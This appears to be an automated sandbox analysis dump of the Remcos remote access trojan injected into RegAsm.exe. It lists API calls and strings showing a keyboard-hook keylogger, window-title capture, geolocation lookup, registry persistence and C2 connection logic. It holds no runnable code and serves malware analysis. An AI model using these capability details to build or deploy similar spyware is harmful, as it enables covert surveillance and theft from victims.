4405dd 20 API calls __dosmaperr 49010->49018 49012->49010 49013 441add 49012->49013 49015 441abc __wsopen_s 49013->49015 49019 4405dd 20 API calls __dosmaperr 49013->49019 49015->48987 49016->49006 49017->49006 49018->49015 49019->49015 49020->48852 49025 40515c 102 API calls 49022->49025 49024 405159 49025->49024 49026->48879 49027->48871 49028->48900 49029->48915 49030->48913 49031->48885 49033->48930 49037 414553 49034->49037 49038 414568 ___scrt_initialize_default_local_stdio_options 49037->49038 49041 43f79d 49038->49041 49044 43c4f0 49041->49044 49045 43c530 49044->49045 49046 43c518 49044->49046 49045->49046 49048 43c538 49045->49048 49059 4405dd 20 API calls __dosmaperr 49046->49059 49049 43a7b7 __cftoe 36 API calls 49048->49049 49050 43c548 49049->49050 49060 43cc76 20 API calls 2 library calls 49050->49060 49051 43c51d __wsopen_s 49053 434fcb CatchGuardHandler 5 API calls 49051->49053 49055 414576 49053->49055 49054 43c5c0 49061 43d2e4 51 API calls 3 library calls 49054->49061 49055->48218 49058 43c5cb 49062 43cce0 20 API calls _free 49058->49062 49059->49051 49060->49054 49061->49058 49062->49051 49064 4020df 11 API calls 49063->49064 49073 404cde 49064->49073 49065 404e13 49066 401fd8 11 API calls 49065->49066 49067 404e1c 49066->49067 49067->48962 49068 4041a2 28 API calls 49068->49073 49069 401fe2 28 API calls 49069->49073 49070 401fc0 28 API calls 49072 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49070->49072 49071 4020f6 28 API calls 49071->49073 49072->49073 49077 415aea 49072->49077 49073->49065 49073->49068 49073->49069 49073->49070 49073->49071 49074 401fd8 11 API calls 49073->49074 49074->49073 49075->48971 49076->48967 49078 4020f6 28 API calls 49077->49078 49079 415b0c SetEvent 49078->49079 49080 415b21 49079->49080 49081 4041a2 28 API calls 49080->49081 49082 415b3b 49081->49082 49083 4020f6 28 API calls 49082->49083 49084 415b4b 49083->49084 49085 4020f6 28 API calls 49084->49085 49086 415b5d 49085->49086 49087 41be1b 

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
              • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
              • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
              • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
              • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad$HandleModule
              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
              • API String ID: 4236061018-3687161714

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
              • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
              • GetLastError.KERNEL32 ref: 0040A2ED
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetMessageA.USER32 ref: 0040A33B
              • TranslateMessage.USER32(?), ref: 0040A34A
              • DispatchMessageA.USER32 ref: 0040A355
              Strings
              • Keylogger initialization failure: error , xrefs: 0040A301
              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
              • String ID: Keylogger initialization failure: error
              • API String ID: 3219506041-952744263

              Control-flow Graph

              APIs
              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
              • String ID:
              • API String ID: 1888522110-0

              Control-flow Graph

              APIs
              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
              • InternetCloseHandle.WININET(00000000), ref: 0041B41C
              • InternetCloseHandle.WININET(00000000), ref: 0041B41F
              Strings
              • http://geoplugin.net/json.gp, xrefs: 0041B3B7
              • API ID: Internet$CloseHandleOpen$FileRead
              • String ID: http://geoplugin.net/json.gp
              • API String ID: 3121278467-91888290

              Control-flow Graph

              APIs
                • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
              • Sleep.KERNEL32(00000BB8), ref: 0040F85B
              • ExitProcess.KERNEL32 ref: 0040F8CA
              Strings
              • API ID: CloseExitOpenProcessQuerySleepValue
              • String ID: 4.9.4 Pro$override$pth_unenc
              • API String ID: 2281282204-930821335
              APIs
              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,008C9ED0), ref: 00433849
              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
              • API ID: Crypt$Context$AcquireRandomRelease
              • String ID:
              • API String ID: 1815803762-0
              APIs
              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
              Strings
              • GetSystemTimePreciseAsFileTime, xrefs: 00448972
              • API ID: Time$FileSystem
              • String ID: GetSystemTimePreciseAsFileTime
              • API String ID: 2086374402-595813830
              APIs
              • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              APIs
              • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0

              Control-flow Graph

              APIs
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
              Strings
              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
              • API String ID: 2830904901-1084268468

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
              • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$ErrorLastLocalTime
              • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG

              Control-flow Graph

              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
              • LoadLibraryA.KERNEL32(?), ref: 00414E17
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
              • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
              • LoadLibraryA.KERNEL32(?), ref: 00414E76
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
              • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
              • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
              Strings
              Similarity
              • API ID: Library$AddressFreeProc$Load$DirectorySystem
              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 0040A740
                • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
              Strings
              Similarity
              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
              • String ID: 8SG$8SG$pQG$pQG$PG$PG

              Control-flow Graph

              APIs
              • __Init_thread_footer.LIBCMT ref: 0040AD38
              • Sleep.KERNEL32(000001F4), ref: 0040AD43
              • GetForegroundWindow.USER32 ref: 0040AD49
              • GetWindowTextLengthW.USER32 ref: 0040AD52
              • WSAGetQOSByName.WS2_32 ref: 0040AD64
              • GetWindowTextW.USER32 ref: 0040AD86
              • Sleep.KERNEL32(000003E8), ref: 0040AE54
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Similarity
              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthName
              • String ID: [${ User has been idle for $ minutes }$]

              Control-flow Graph

              APIs
              • connect.WS2_32(?,?,?), ref: 004048E0
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
              • WSAGetLastError.WS2_32 ref: 00404A21
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Similarity
              • API ID: CreateEvent$ErrorLastLocalTimeconnect
              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |

              Control-flow Graph

              APIs
              Strings
              Similarity
              • API ID: LongNamePath
              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32

              Control-flow Graph

              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
              • __alloca_probe_16.LIBCMT ref: 0044ACDB
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
              • __alloca_probe_16.LIBCMT ref: 0044ADC0
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
              • __freea.LIBCMT ref: 0044AE30
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • __freea.LIBCMT ref: 0044AE39
              • __freea.LIBCMT ref: 0044AE5E
              Similarity
              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
              • String ID:

              Control-flow Graph

              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
              • CloseHandle.KERNEL32(00000000), ref: 0041C459
              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
              • CloseHandle.KERNEL32(00000000), ref: 0041C477
              Strings
              Similarity
              • API ID: File$CloseHandle$CreatePointerWrite
              • String ID: hpF

              Control-flow Graph

              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
              • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
              Strings
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue
              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
              • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
              • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
              Strings
              Similarity
              • API ID: File$CloseCreateHandleSizeSleep
              • String ID: XQG
              APIs
              Strings
              Similarity
              • API ID: CountEventTick
              • String ID: !D@$NG
              APIs
              • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
              Strings
              Similarity
              • API ID: CreateThread$LocalTimewsprintf
              • String ID: Offline Keylogger Started
              APIs
              • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
              Similarity
              • API ID: Create$EventLocalThreadTime
              • String ID: KeepAlive | Enabled | Timeout:
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
              • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
              • RegCloseKey.KERNEL32(?), ref: 004137B1
              Strings
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
              • CloseHandle.KERNEL32(?), ref: 00404DDB
              Similarity
              • API ID: Create$CloseEventHandleObjectSingleThreadWait
              • String ID:
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
              • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              APIs
              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
              • GetLastError.KERNEL32 ref: 0040D083
              Strings
              Similarity
              • API ID: CreateErrorLastMutex
              • String ID: SG
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
              • RegQueryValueExA.KERNEL32 ref: 004135E7
              • RegCloseKey.KERNEL32(?), ref: 004135F2
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID:
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
              • RegQueryValueExA.KERNEL32 ref: 0041372D
              • RegCloseKey.KERNEL32(00000000), ref: 00413738
              • API ID: CloseOpenQueryValue
              • String ID:
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
              • RegQueryValueExA.KERNEL32 ref: 00413587
              • RegCloseKey.KERNEL32(?), ref: 00413592
              • API ID: CloseOpenQueryValue
              • String ID:
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
              • RegQueryValueExA.KERNEL32 ref: 0041352A
              • RegCloseKey.KERNEL32(?), ref: 00413535
              • API ID: CloseOpenQueryValue
              • String ID:
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
              • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
              • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
              • API ID: CloseCreateValue
              • String ID:
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
              Strings
              • API ID: Info
              • String ID:
              APIs
              Strings
              • API ID: _wcslen
              • String ID: pQG
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
              Strings
              • API ID: String
              • String ID: LCMapStringEx
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
              Strings
              • InitializeCriticalSectionEx, xrefs: 00448A9F
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              APIs
              Strings
              • API ID: Alloc
              • String ID: FlsAlloc
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00438DA9
              Strings
              • API ID: try_get_function
              • String ID: FlsAlloc
              APIs
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
              Strings
              • API ID: GlobalMemoryStatus
              • String ID: @
              APIs
                • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
              • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
              • API ID: CodeInfoPageValid
              • String ID:
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • _free.LIBCMT ref: 0044EFD0
              • _free.LIBCMT ref: 0044F006
              • API ID: _free$ErrorLast_abort
              • String ID:
              APIs
              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              APIs
              • socket.WS2_32(?,00000001,00000006), ref: 00404852
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              • API ID: CreateEventStartupsocket
              • String ID:
              APIs
              • API ID: Window$ForegroundText
